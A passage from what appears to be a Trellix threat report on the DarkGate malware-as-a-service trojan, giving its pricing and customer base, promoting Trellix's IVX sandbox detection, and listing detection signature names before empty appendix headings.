DarkGate's monthly fee of $15,000 is a barrier for most potential buyers. Earlier reports described the tool's distribution as exclusive, with only 10 individuals obtaining it. That figure has since grown to 30, which still makes DarkGate a limited MaaS compared to other families, something consistent with the prevalence of previous versions, for which only a few reports were shared.
Nevertheless, DarkGate version 4 has attracted a lot of attention and has spread massively around the world. The hash IoCs, DLLs, shellcodes and C&C servers presented in the Annex highlight the vast infrastructure that supports DarkGate; despite its constrained customer base, it represents a significant cyber threat.
Appendix A – Trellix DarkGate detection
Trellix IVX analysis
While the DarkGate author has implemented many mechanisms to bypass endpoint security software, such as packers, encryption, obfuscation and direct syscalls, the core behavior of the trojan has not changed radically over the years, apart from the added functionality.
Trellix Intelligent Virtual Execution (IVX) sandbox identifies attacks that evade traditional signature-based defenses by detonating suspicious files, web objects, URLs, and email attachments within a proprietary hypervisor instrumented for over 200 potential simultaneous executions.
Trellix IVX detects and identifies the latest DarkGate samples based on their fundamental behavioral traits, some of which, ironically, were implemented to evade security and virtualization software.
Additionally, Trellix IVX provides detailed information about the malware's activity, such as file system and registry modifications, network events and API calls, together with memory dumps of every spawned process, full network traffic and dumps of every dropped payload. These items can be used to visualize the trojan's activities, which are mapped to a MITRE ATT&CK chart, to extract specific IOCs, and to create custom YARA rules for additional threat hunting.
Trellix IVX is natively integrated with the Trellix Network, Email and Endpoint products, so every artifact (email, binary or URL) can be sent to IVX for analysis automatically. IVX is also compatible with platforms such as Box, Dropbox, Teams, Slack, Amazon S3 and SharePoint, so that if DarkGate were distributed through one of these channels it would be scanned automatically, preventing the user from being infected.
More information about Trellix IVX On-Premise, Virtual and Cloud sandbox offerings can be found in the following datasheets.
Trellix prevention guidelines
Detection as a Service
Suspicious Network Activity 10146
Suspicious Network Activity 10438
Suspicious Codeinjection Activity 10005
Suspicious File AVCheck Activity 10312
Appendix B – MITRE ATT&CK
Appendix C - IoCs
Shellcode to restart DarkGate